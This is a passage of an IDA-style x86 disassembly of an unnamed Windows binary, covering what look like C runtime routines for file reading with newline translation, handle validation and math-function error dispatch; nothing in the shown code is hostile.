dec [ebp+arg_8]
cmp [ebp+var_2], 1
mov [ebp+var_10], 2
mov byte ptr [esi+ecx+25h], 0Ah
jnz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+26h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
mov [ebp+var_10], 3
mov byte ptr [esi+ecx+26h], 0Ah
loc_409F1D: ; CODE XREF: sub_409DAD+F8�j
; sub_409DAD+100�j ...
push 0
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jz loc_40A312
mov edi, [ebp+var_18]
test edi, edi
jl loc_40A312
cmp edi, [ebp+arg_8]
ja loc_40A312
mov eax, [ebx]
add [ebp+var_10], edi
lea eax, [esi+eax+4]
test byte ptr [eax], 80h
jz loc_40A1B2
cmp [ebp+var_2], 2
jz loc_40A1DC
test edi, edi
jz short loc_409FE7
mov ecx, [ebp+var_C]
cmp byte ptr [ecx], 0Ah
jnz short loc_409FE7
or byte ptr [eax], 4
jmp short loc_409FEA
; ---------------------------------------------------------------------------
loc_409F7B: ; CODE XREF: sub_409DAD+CE�j
mov eax, edx
not eax
test al, 1
jnz short loc_409FA4
loc_409F83: ; CODE XREF: sub_409DAD+BA�j
; sub_409DAD+DD�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 16h
loc_409F95: ; CODE XREF: sub_409DAD+9C�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_409FDF
; ---------------------------------------------------------------------------
loc_409FA4: ; CODE XREF: sub_409DAD+1D4�j
mov eax, edx
push 4
pop ecx
shr eax, 1
cmp eax, ecx
mov [ebp+arg_8], ecx
jb short loc_409FB5
mov [ebp+arg_8], eax
loc_409FB5: ; CODE XREF: sub_409DAD+203�j
push [ebp+arg_8]
call sub_40773A
cmp eax, edi
pop ecx
mov [ebp+var_C], eax
jnz loc_409E99
call sub_4057D3
mov dword ptr [eax], 0Ch
call sub_4057E6
mov dword ptr [eax], 8
loc_409FDF: ; CODE XREF: sub_409DAD+1F5�j
or eax, 0FFFFFFFFh
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_409FE7: ; CODE XREF: sub_409DAD+1BF�j
; sub_409DAD+1C7�j
and byte ptr [eax], 0FBh
loc_409FEA: ; CODE XREF: sub_409DAD+1CC�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A0D0
loc_40A000: ; CODE XREF: sub_409DAD+306�j
mov ecx, [ebp+arg_8]
mov al, [ecx]
cmp al, 1Ah
jz loc_40A0BB
cmp al, 0Dh
jz short loc_40A01D
mov [edi], al
inc edi
inc ecx
mov [ebp+arg_8], ecx
jmp loc_40A0AD
; ---------------------------------------------------------------------------
loc_40A01D: ; CODE XREF: sub_409DAD+262�j
mov eax, [ebp+var_10]
dec eax
cmp ecx, eax
jnb short loc_40A03C
lea eax, [ecx+1]
cmp byte ptr [eax], 0Ah
jnz short loc_40A037
inc ecx
inc ecx
mov [ebp+arg_8], ecx
loc_40A032: ; CODE XREF: sub_409DAD+2CA�j
; sub_409DAD+2E3�j
mov byte ptr [edi], 0Ah
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A037: ; CODE XREF: sub_409DAD+27E�j
mov [ebp+arg_8], eax
jmp short loc_40A0A9
; ---------------------------------------------------------------------------
loc_40A03C: ; CODE XREF: sub_409DAD+276�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_18]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jnz short loc_40A064
call ds:dword_41D0F0
test eax, eax
jnz short loc_40A0A9
loc_40A064: ; CODE XREF: sub_409DAD+2AB�j
cmp [ebp+var_18], 0
jz short loc_40A0A9
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A087
cmp [ebp+var_1], 0Ah
jz short loc_40A032
mov byte ptr [edi], 0Dh
mov eax, [ebx]
mov cl, [ebp+var_1]
mov [esi+eax+5], cl
jmp short loc_40A0AC
; ---------------------------------------------------------------------------
loc_40A087: ; CODE XREF: sub_409DAD+2C4�j
cmp edi, [ebp+var_C]
jnz short loc_40A092
cmp [ebp+var_1], 0Ah
jz short loc_40A032
loc_40A092: ; CODE XREF: sub_409DAD+2DD�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_1], 0Ah
jz short loc_40A0AD
loc_40A0A9: ; CODE XREF: sub_409DAD+28D�j
; sub_409DAD+2B5�j ...
mov byte ptr [edi], 0Dh
loc_40A0AC: ; CODE XREF: sub_409DAD+288�j
; sub_409DAD+2D8�j
inc edi
loc_40A0AD: ; CODE XREF: sub_409DAD+26B�j
; sub_409DAD+2FA�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A000
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0BB: ; CODE XREF: sub_409DAD+25A�j
mov eax, [ebx]
lea eax, [esi+eax+4]
test byte ptr [eax], 40h
jnz short loc_40A0CB
or byte ptr [eax], 2
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
loc_40A0CB: ; CODE XREF: sub_409DAD+317�j
mov al, [ecx]
mov [edi], al
inc edi
loc_40A0D0: ; CODE XREF: sub_409DAD+24D�j
; sub_409DAD+30C�j ...
mov eax, edi
sub eax, [ebp+var_C]
cmp [ebp+var_2], 1
mov [ebp+var_10], eax
jnz loc_40A1B2
test eax, eax
jz loc_40A1B2
dec edi
mov cl, [edi]
test cl, cl
js short loc_40A0F7
inc edi
jmp loc_40A17D
; ---------------------------------------------------------------------------
loc_40A0F7: ; CODE XREF: sub_409DAD+342�j
xor eax, eax
inc eax
movzx ecx, cl
jmp short loc_40A10E
; ---------------------------------------------------------------------------
loc_40A0FF: ; CODE XREF: sub_409DAD+368�j
cmp eax, 4
jg short loc_40A117
cmp edi, [ebp+var_C]
jb short loc_40A117
dec edi
movzx ecx, byte ptr [edi]
inc eax
loc_40A10E: ; CODE XREF: sub_409DAD+350�j
cmp ds:byte_423CB8[ecx], 0
jz short loc_40A0FF
loc_40A117: ; CODE XREF: sub_409DAD+355�j
; sub_409DAD+35A�j
mov dl, [edi]
movzx ecx, dl
movsx ecx, ds:byte_423CB8[ecx]
test ecx, ecx
jnz short loc_40A134
call sub_4057D3
mov dword ptr [eax], 2Ah
jmp short loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A134: ; CODE XREF: sub_409DAD+378�j
inc ecx
cmp ecx, eax
jnz short loc_40A13D
add edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A13D: ; CODE XREF: sub_409DAD+38A�j
mov ecx, [ebx]
add ecx, esi
test byte ptr [ecx+4], 48h
jz short loc_40A16B
inc edi
cmp eax, 2
mov [ecx+5], dl
jl short loc_40A159
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+25h], dl
inc edi
loc_40A159: ; CODE XREF: sub_409DAD+3A1�j
cmp eax, 3
jnz short loc_40A167
mov dl, [edi]
mov ecx, [ebx]
mov [esi+ecx+26h], dl
inc edi
loc_40A167: ; CODE XREF: sub_409DAD+3AF�j
sub edi, eax
jmp short loc_40A17D
; ---------------------------------------------------------------------------
loc_40A16B: ; CODE XREF: sub_409DAD+398�j
neg eax
cdq
push 1
push edx
push eax
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
loc_40A17D: ; CODE XREF: sub_409DAD+345�j
; sub_409DAD+38E�j ...
mov eax, [ebp+var_1C]
sub edi, [ebp+var_C]
shr eax, 1
push eax
push [ebp+arg_4]
push edi
push [ebp+var_C]
push 0
push 0FDE9h
call ds:dword_41D0A0
test eax, eax
mov [ebp+var_10], eax
jnz short loc_40A1D5
call ds:dword_41D0F0
loc_40A1A7: ; CODE XREF: sub_409DAD+58C�j
push eax
call sub_4057F9
pop ecx
loc_40A1AE: ; CODE XREF: sub_409DAD+385�j
; sub_409DAD+584�j
or [ebp+var_14], 0FFFFFFFFh
loc_40A1B2: ; CODE XREF: sub_409DAD+1AD�j
; sub_409DAD+32F�j ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jz short loc_40A1C1
push eax
call sub_403603
pop ecx
loc_40A1C1: ; CODE XREF: sub_409DAD+40B�j
mov eax, [ebp+var_14]
cmp eax, 0FFFFFFFEh
jnz loc_40A34A
mov eax, [ebp+var_10]
jmp loc_40A34A
; ---------------------------------------------------------------------------
loc_40A1D5: ; CODE XREF: sub_409DAD+3F2�j
add eax, eax
mov [ebp+var_10], eax
jmp short loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A1DC: ; CODE XREF: sub_409DAD+1B7�j
test edi, edi
jz short loc_40A1EE
mov ecx, [ebp+var_C]
cmp word ptr [ecx], 0Ah
jnz short loc_40A1EE
or byte ptr [eax], 4
jmp short loc_40A1F1
; ---------------------------------------------------------------------------
loc_40A1EE: ; CODE XREF: sub_409DAD+431�j
; sub_409DAD+43A�j
and byte ptr [eax], 0FBh
loc_40A1F1: ; CODE XREF: sub_409DAD+43F�j
mov edi, [ebp+var_C]
mov eax, [ebp+var_10]
add eax, edi
cmp edi, eax
mov [ebp+arg_8], edi
mov [ebp+var_10], eax
jnb loc_40A307
loc_40A207: ; CODE XREF: sub_409DAD+53A�j
mov eax, [ebp+arg_8]
movzx ecx, word ptr [eax]
cmp cx, 1Ah
jz loc_40A2EF
cmp cx, 0Dh
jz short loc_40A22C
mov [edi], cx
inc edi
inc edi
inc eax
inc eax
mov [ebp+arg_8], eax
jmp loc_40A2E1
; ---------------------------------------------------------------------------
loc_40A22C: ; CODE XREF: sub_409DAD+46E�j
mov ecx, [ebp+var_10]
add ecx, 0FFFFFFFEh
cmp eax, ecx
jnb short loc_40A257
lea ecx, [eax+2]
cmp word ptr [ecx], 0Ah
jnz short loc_40A24F
add eax, 4
mov [ebp+arg_8], eax
loc_40A245: ; CODE XREF: sub_409DAD+4E7�j
; sub_409DAD+513�j
mov word ptr [edi], 0Ah
jmp loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A24F: ; CODE XREF: sub_409DAD+490�j
mov [ebp+arg_8], ecx
jmp loc_40A2DA
; ---------------------------------------------------------------------------
loc_40A257: ; CODE XREF: sub_409DAD+487�j
add [ebp+arg_8], 2
push 0
lea eax, [ebp+var_18]
push eax
push 2
lea eax, [ebp+var_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jnz short loc_40A280
call ds:dword_41D0F0
test eax, eax
jnz short loc_40A2DA
loc_40A280: ; CODE XREF: sub_409DAD+4C7�j
cmp [ebp+var_18], 0
jz short loc_40A2DA
mov eax, [ebx]
test byte ptr [esi+eax+4], 48h
jz short loc_40A2B6
cmp [ebp+var_8], 0Ah
jz short loc_40A245
mov word ptr [edi], 0Dh
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8]
mov [esi+eax+5], cl
mov eax, [ebx]
mov cl, byte ptr [ebp+var_8+1]
mov [esi+eax+25h], cl
mov eax, [ebx]
mov byte ptr [esi+eax+26h], 0Ah
jmp short loc_40A2DF
; ---------------------------------------------------------------------------
loc_40A2B6: ; CODE XREF: sub_409DAD+4E0�j
cmp edi, [ebp+var_C]
jnz short loc_40A2C2
cmp [ebp+var_8], 0Ah
jz short loc_40A245
loc_40A2C2: ; CODE XREF: sub_409DAD+50C�j
push 1
push 0FFFFFFFFh
push 0FFFFFFFEh
push [ebp+arg_0]
call sub_40CCBE
add esp, 10h
cmp [ebp+var_8], 0Ah
jz short loc_40A2E1
loc_40A2DA: ; CODE XREF: sub_409DAD+4A5�j
; sub_409DAD+4D1�j ...
mov word ptr [edi], 0Dh
loc_40A2DF: ; CODE XREF: sub_409DAD+49D�j
; sub_409DAD+507�j
inc edi
inc edi
loc_40A2E1: ; CODE XREF: sub_409DAD+47A�j
; sub_409DAD+52B�j
mov eax, [ebp+var_10]
cmp [ebp+arg_8], eax
jb loc_40A207
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2EF: ; CODE XREF: sub_409DAD+464�j
mov ecx, [ebx]
lea esi, [esi+ecx+4]
test byte ptr [esi], 40h
jnz short loc_40A2FF
or byte ptr [esi], 2
jmp short loc_40A307
; ---------------------------------------------------------------------------
loc_40A2FF: ; CODE XREF: sub_409DAD+54B�j
mov ax, [eax]
mov [edi], ax
inc edi
inc edi
loc_40A307: ; CODE XREF: sub_409DAD+454�j
; sub_409DAD+540�j ...
sub edi, [ebp+var_C]
mov [ebp+var_10], edi
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A312: ; CODE XREF: sub_409DAD+187�j
; sub_409DAD+192�j ...
call ds:dword_41D0F0
push 5
pop esi
cmp eax, esi
jnz short loc_40A336
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], esi
jmp loc_40A1AE
; ---------------------------------------------------------------------------
loc_40A336: ; CODE XREF: sub_409DAD+570�j
cmp eax, 6Dh
jnz loc_40A1A7
and [ebp+var_14], 0
jmp loc_40A1B2
; ---------------------------------------------------------------------------
loc_40A348: ; CODE XREF: sub_409DAD+A6�j
; sub_409DAD+AF�j
xor eax, eax
loc_40A34A: ; CODE XREF: sub_409DAD+235�j
; sub_409DAD+41A�j ...
pop ebx
loc_40A34B: ; CODE XREF: sub_409DAD+66�j
pop edi
loc_40A34C: ; CODE XREF: sub_409DAD+30�j
pop esi
leave
retn
sub_409DAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A34F proc near ; CODE XREF: sub_403B22+C9�p
; sub_409C8D+73�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset dword_4215C0
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40A37E
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_40A376: ; CODE XREF: sub_40A34F+5C�j
or eax, 0FFFFFFFFh
jmp loc_40A41B
; ---------------------------------------------------------------------------
loc_40A37E: ; CODE XREF: sub_40A34F+12�j
xor edi, edi
cmp eax, edi
jl short loc_40A38C
cmp eax, ds:dword_433C84
jb short loc_40A3AD
loc_40A38C: ; CODE XREF: sub_40A34F+33�j
; sub_40A34F+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_40A376
; ---------------------------------------------------------------------------
loc_40A3AD: ; CODE XREF: sub_40A34F+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40A38C
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40A3F6
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409DAD
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_40A40C
; ---------------------------------------------------------------------------
loc_40A3F6: ; CODE XREF: sub_40A34F+8F�j
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], edi
or [ebp+var_1C], 0FFFFFFFFh
loc_40A40C: ; CODE XREF: sub_40A34F+A5�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40A421
mov eax, [ebp+var_1C]
loc_40A41B: ; CODE XREF: sub_40A34F+2A�j
call __SEH_epilog4
retn
sub_40A34F endp
; =============== S U B R O U T I N E =======================================
sub_40A421 proc near ; CODE XREF: sub_40A34F+C4�p
; DATA XREF: J8@F_7_S:004215D8�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40A421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A42B proc near ; CODE XREF: sub_403DA0+B5�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
xor eax, eax
cmp ds:dword_4262F0, eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
mov byte ptr [ebp+var_8], al
mov byte ptr [ebp+var_8+1], al
mov byte ptr [ebp+var_8+2], al
mov byte ptr [ebp+var_8+3], al
mov byte ptr [ebp+var_8+4], al
mov byte ptr [ebp+var_8+5], al
mov byte ptr [ebp+var_8+6], al
mov byte ptr [ebp+var_8+7], al
jz short loc_40A46D
push ds:dword_433C80
call sub_405193
pop ecx
jmp short loc_40A472
; ---------------------------------------------------------------------------
loc_40A46D: ; CODE XREF: sub_40A42B+32�j
mov eax, offset sub_40F708
loc_40A472: ; CODE XREF: sub_40A42B+40�j
mov ecx, [ebp+arg_C]
mov edx, 0A6h
cmp ecx, edx
jg loc_40A5F6
jz loc_40A5E3
cmp ecx, 19h
jg loc_40A589
jz loc_40A580
mov edx, ecx
push 2
pop ecx
sub edx, ecx
jz loc_40A571
dec edx
jz loc_40A568
sub edx, 5
jz loc_40A559
dec edx
jz loc_40A541
sub edx, 5
jz short loc_40A531
dec edx
jz short loc_40A508
sub edx, 9
jnz loc_40A6A0 ; default
mov [ebp+var_28], 3
loc_40A4D3: ; CODE XREF: sub_40A42B+1AC�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A4DA: ; CODE XREF: sub_40A42B+114�j
; sub_40A42B+138�j ...
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
test eax, eax
pop ecx
jnz loc_40A69B
call sub_4057D3
mov dword ptr [eax], 22h
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A508: ; CODE XREF: sub_40A42B+96�j
mov [ebp+var_24], offset aExp ; "exp"
loc_40A50F: ; CODE XREF: sub_40A42B+15C�j
fld qword ptr [edi]
lea ecx, [ebp+var_28]
fstp [ebp+var_20]
push ecx
fld qword ptr [ebx]
mov [ebp+var_28], 4
fstp [ebp+var_18]
fld qword ptr [esi]
fstp [ebp+var_10]
call eax
pop ecx
jmp loc_40A69B
; ---------------------------------------------------------------------------
loc_40A531: ; CODE XREF: sub_40A42B+93�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp ; "exp"
jmp short loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A541: ; CODE XREF: sub_40A42B+8A�j
mov [ebp+var_24], offset aLog10 ; "log10"
loc_40A548: ; CODE XREF: sub_40A42B+144�j
; sub_40A42B+181�j ...
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
fld qword ptr [esi]
jmp loc_40A67B
; ---------------------------------------------------------------------------
loc_40A559: ; CODE XREF: sub_40A42B+83�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog10 ; "log10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A568: ; CODE XREF: sub_40A42B+7A�j
mov [ebp+var_24], offset aLog ; "log"
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A571: ; CODE XREF: sub_40A42B+73�j
mov [ebp+var_28], ecx
mov [ebp+var_24], offset aLog ; "log"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A580: ; CODE XREF: sub_40A42B+66�j
mov [ebp+var_24], offset aPow ; "pow"
jmp short loc_40A50F
; ---------------------------------------------------------------------------
loc_40A589: ; CODE XREF: sub_40A42B+60�j
sub ecx, 1Ah
jz short loc_40A5DC
dec ecx
jz short loc_40A5D0
dec ecx
jz short loc_40A5C4 ; jumptable 0040A605 case 1006
dec ecx
jz short loc_40A5B7
sub ecx, 1Dh
jz short loc_40A5AE ; jumptable 0040A605 case 1008
sub ecx, 3
jnz loc_40A6A0 ; default
loc_40A5A5: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aAsin ; jumptable 0040A605 case 1009
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5AE: ; CODE XREF: sub_40A42B+16F�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aAcos ; jumptable 0040A605 case 1008
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5B7: ; CODE XREF: sub_40A42B+16A�j
mov [ebp+var_24], offset aPow ; "pow"
loc_40A5BE: ; CODE XREF: sub_40A42B+1E8�j
; sub_40A42B+1F1�j ...
fld qword ptr [edi]
fstp qword ptr [esi]
jmp short loc_40A548
; ---------------------------------------------------------------------------
loc_40A5C4: ; CODE XREF: sub_40A42B+167�j
; sub_40A42B+1DA�j
; DATA XREF: ...
mov [ebp+var_24], offset aPow ; jumptable 0040A605 case 1006
jmp loc_40A548
; ---------------------------------------------------------------------------
loc_40A5D0: ; CODE XREF: sub_40A42B+164�j
mov [ebp+var_28], 2
jmp loc_40A4D3
; ---------------------------------------------------------------------------
loc_40A5DC: ; CODE XREF: sub_40A42B+161�j
fld1
jmp loc_40A69E
; ---------------------------------------------------------------------------
loc_40A5E3: ; CODE XREF: sub_40A42B+57�j
mov [ebp+var_28], 3
mov [ebp+var_24], offset aExp10 ; "exp10"
jmp loc_40A4DA
; ---------------------------------------------------------------------------
loc_40A5F6: ; CODE XREF: sub_40A42B+51�j
add ecx, 0FFFFFC18h ; switch 13 cases
cmp ecx, 0Ch
ja loc_40A6A0 ; default
jmp off_40A6A7[ecx*4] ; switch jump
loc_40A60C: ; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aLog ; jumptable 0040A605 case 1000
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A615: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aLog10 ; jumptable 0040A605 case 1001
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A61E: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aExp ; jumptable 0040A605 case 1002
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A627: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aAtan ; jumptable 0040A605 case 1003
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A630: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aCeil ; jumptable 0040A605 case 1004
jmp short loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A639: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aFloor ; jumptable 0040A605 case 1005
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A645: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset aModf ; jumptable 0040A605 case 1007
jmp loc_40A5BE
; ---------------------------------------------------------------------------
loc_40A651: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBC0 ; jumptable 0040A605 case 1010
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A65A: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBBC ; jumptable 0040A605 case 1011
jmp short loc_40A66A
; ---------------------------------------------------------------------------
loc_40A663: ; CODE XREF: sub_40A42B+1DA�j
; DATA XREF: J8@F_7_S:off_40A6A7�o
mov [ebp+var_24], offset dword_41DBB8 ; jumptable 0040A605 case 1012
loc_40A66A: ; CODE XREF: sub_40A42B+22D�j
; sub_40A42B+236�j
fld qword ptr [edi]
fmul [ebp+var_8]
fst qword ptr [esi]
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
loc_40A67B: ; CODE XREF: sub_40A42B+129�j
lea ecx, [ebp+var_28]
fstp [ebp+var_10]
push ecx
mov [ebp+var_28], 1
call eax
test eax, eax
pop ecx
jnz short loc_40A69B
call sub_4057D3
mov dword ptr [eax], 21h
loc_40A69B: ; CODE XREF: sub_40A42B+C7�j
; sub_40A42B+D8�j ...
fld [ebp+var_10]
loc_40A69E: ; CODE XREF: sub_40A42B+1B3�j
fstp qword ptr [esi]
loc_40A6A0: ; CODE XREF: sub_40A42B+9B�j
; sub_40A42B+174�j ...
pop edi ; default
pop esi
pop ebx
leave
retn
sub_40A42B endp
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
off_40A6A7 dd offset loc_40A60C ; DATA XREF: sub_40A42B+1DA�r
dd offset loc_40A615 ; jump table for switch statement
dd offset loc_40A61E
dd offset loc_40A627
dd offset loc_40A630
dd offset loc_40A639
dd offset loc_40A5C4
dd offset loc_40A645
dd offset loc_40A5AE
dd offset loc_40A5A5
dd offset loc_40A651
dd offset loc_40A65A
dd offset loc_40A663
; =============== S U B R O U T I N E =======================================
sub_40A6DB proc near ; DATA XREF: J8@F_7_S:0041D2CC�o
and ds:dword_433C78, 0
call sub_40F7D9
mov ds:dword_433C78, eax
xor eax, eax
retn
sub_40A6DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A6EF(double)
sub_40A6EF proc near ; CODE XREF: sub_403DA0+7�j
; sub_403DA0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_423DB8
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_40A775
call sub_40FF3C
test eax, eax
pop ecx
pop ecx
jle short loc_40A758
cmp eax, 2
jle short loc_40A74A
cmp eax, 3
jnz short loc_40A758
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_40FDF4
add esp, 10h
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A74A: ; CODE XREF: sub_40A6EF+3F�j
push esi
push ebx
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A758: ; CODE XREF: sub_40A6EF+3A�j
; sub_40A6EF+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_41DBF0
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_40A7B4
; ---------------------------------------------------------------------------
loc_40A775: ; CODE XREF: sub_40A6EF+2F�j
call sub_40FF01
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fcomp [ebp+var_8]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_40A79A
loc_40A78C: ; CODE XREF: sub_40A6EF+AE�j
push esi
push ebx
call sub_41005D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A79A: ; CODE XREF: sub_40A6EF+9B�j
test bl, 20h
jnz short loc_40A78C
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_40A7B4: ; CODE XREF: sub_40A6EF+84�j
call sub_40FE47
add esp, 1Ch
loc_40A7BC: ; CODE XREF: sub_40A6EF+59�j
; sub_40A6EF+67�j ...
pop esi
pop ebx
leave
retn
sub_40A6EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7C0 proc near ; CODE XREF: sub_40A9EB:loc_40AA0A�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_40271F
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_40A7E1
mov [eax], esi
loc_40A7E1: ; CODE XREF: sub_40A7C0+1D�j
cmp esi, edi
jnz short loc_40A811
loc_40A7E5: ; CODE XREF: sub_40A7C0+5A�j
; sub_40A7C0+60�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40A80A
